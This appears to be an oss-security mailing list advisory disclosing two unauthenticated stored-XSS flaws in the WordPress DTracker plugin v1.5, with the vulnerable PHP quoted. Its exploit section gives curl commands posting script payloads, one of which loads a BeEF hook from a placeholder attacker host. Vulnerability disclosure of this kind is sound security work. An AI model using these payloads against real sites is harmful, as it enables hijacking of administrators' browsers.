Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 20 Mar 2017 20:22:09 -0400
From: "Larry W. Cashdollar" <larry0@...com>
To: Open Source Security <oss-security@...ts.openwall.com>
Subject: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5

Title: Two Content Injection vulnerabilities in Wordpress Plugin DTracker v1.5
Author: Larry W. Cashdollar, @_larry0
Date: 2017-03-08
CVE-ID:[CVE-2017-1002006][CVE-2017-1002007]
Download Site: https://wordpress.org/plugins/dtracker/
Vendor: https://profiles.wordpress.org/dijo/
Vendor Notified: 2017-03-09
Vendor Contact: plugins@...dpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=186
Description: Track the details of the users downloading the pdf files from wordpress site.
Vulnerability:
CVE-2017-1002006:
In file dtracker/save_contact.php

Doesn't check that the user is authorized before injecting new contacts into the wp_contact table.  A simple post request will allow any user to add new contacts.  A malicious user could inject javascript into the database to be executed in the browser of the admin user.  

$name 		= $_POST['name'];
	$company	= $_POST['company'];
	$phone 		= $_POST['phone'];
	$country	= $_POST['country'];
	$contact_id = $_POST['contact_id'];
	
	$table 	= 'wp_contacts';
	$data	= array(
				'name'		=> $name,
				'company'	=> $company,
				'phone'		=> $phone,
				'country'	=> $country,
			);
	$where	= array(
				'id'	=> $contact_id
			);
	
$wpdb->flush();
	
$wpdb->update( $table, $data, $where ); //Update the Contact

CVE-2017-1002007:
In file dtracker/save_mail.php

Doesn't check that the user is authorized before injecting new emails into the wp_contact table.  A simple post request will allow any user to add new contacts.  A malicious user could inject javascript into the database to be executed in the browser of the admin user.  


$email 	= $_POST['email'];
	$time	= date('Y-m-d H:i:s');
	$ip		= $_SERVER [ 'REMOTE_ADDR' ] ; //get IP address of the visitor
	
	$table 	= "wp_contacts";
	$data	= array (
				'email' 	=> $email,
				'time'		=> $time,
				'ip'		=> $ip	
			);
	
	$wpdb->insert( $table, $data); //Insert Values
	$contact_id = $wpdb->insert_id; //Get ID of the last inserted row
	$data['contactId'] = $contact_id;
	echo json_encode($data); //Pass the id to the JS

Export: JSON TEXT XML
Exploit Code:
	• $ curl --data "email=\"><script>alert(1);</script>" http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php
	• {"email":"\\\"><script>alert(1);<\/script>","time":"2017-03-09 00:54:06","ip":"example.com","contactId":10577}
	•  
	• Or better yet, inject a BeEF hook:
	•  
	• $ curl --data 'email="><script src=http://BeEF_Host:3000/hook.js></script>' http://example.com/wordpress/wp-content/plugins/dtracker/save_mail.php

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ